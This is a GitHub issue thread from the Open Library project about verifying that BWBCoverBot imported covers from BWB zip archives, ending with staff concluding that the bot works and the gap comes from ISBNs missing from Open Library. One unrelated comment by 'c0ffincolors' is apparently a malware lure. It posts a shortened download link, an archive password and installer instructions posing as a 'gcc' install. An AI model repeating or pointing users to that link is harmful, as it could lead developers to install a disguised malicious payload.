### ISSUE TITLE
Verify BWBCoverBot imported all covers correctly

### ISSUE THREAD

**Issue by scottbarnes** [internetarchive/openlibrary#9815]
### Problem

This issue can only be completed by staff.

[BWBCoverBot](https://github.com/internetarchive/openlibrary-bots/commits/master/BWBCoverBot) recently finished importing covers from the BWB covers zips.

We need to look at the August 31 dump and ensure that all covers from the zips are present in the dump. The zips to compare with are found in the "done" directory on `ol-home0` (e.g. `/1/var/tmp/imports/covers/done/Nov2022_10_lc_13.zip`).

UPDATE: everything seems to be working properly, but many ISBNs from the zips simply appear not to be in Open Library records. The requirements have been updated.

### Context

Edit: see the comments for the status.

#### Requirements Checklist
* [ ] Get a list of the ISBNs for which we have covers in the BWB cover zips which are not in Open Library.
* [ ] Import the records.

Outdated
* ~~[ ] ensure that for every cover ISBN in the BWB cover zips in the "done" directory on `ol-home0`, the associated edition with that ISBN in the editions dump has at least one cover. Ensure duplicate editions (where the same ISBN is associated with multiple editions) is accounted for.~~
* ~~[ ] Track how often edition/ISBN dupes exist and how many times only one edition has a cover associated with it. For this, check what type of query BWBCoverBot uses and perhaps use something like https://openlibrary.org/query.json?type=/type/edition&isbn_10=1111111111&sort=created if BWBCoverBot is using `/isbn` (and therefore only accessing index 0 from the list of matches).~~

#### Related files

*

#### Stakeholders

*
<hr>

#### Instructions for Contributors

- Please [run these commands](https://github.com/internetarchive/openlibrary/wiki/Git-Cheat-Sheet#working-on-your-branch) to ensure your repository is up to date **before** [creating a new branch](https://github.com/internetarchive/openlibrary/wiki/Git-Cheat-Sheet#making-changes-and-creating-a-pull-request) to work on this issue and **each time after** pushing code to Github, because the pre-commit bot may add commits to your PRs upstream.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by scottbarnes** [comment]
An update on this: the process, `BWBCoverBot`, etc., appear to be working as expected. The issue is that thousands of ISBNs associated with covers in the zips simply are not in Open Library.

I've updated the issue, though perhaps a new issue is needed? Not sure.

**Comment by scottbarnes** [comment]
Having determined that `BWBCoverBot` is working as expected, and that the 'problem' here was that covers were not imported simply because the ISBNs are not in Open Library, this issue is being closed.

Next steps can be found in #9925.
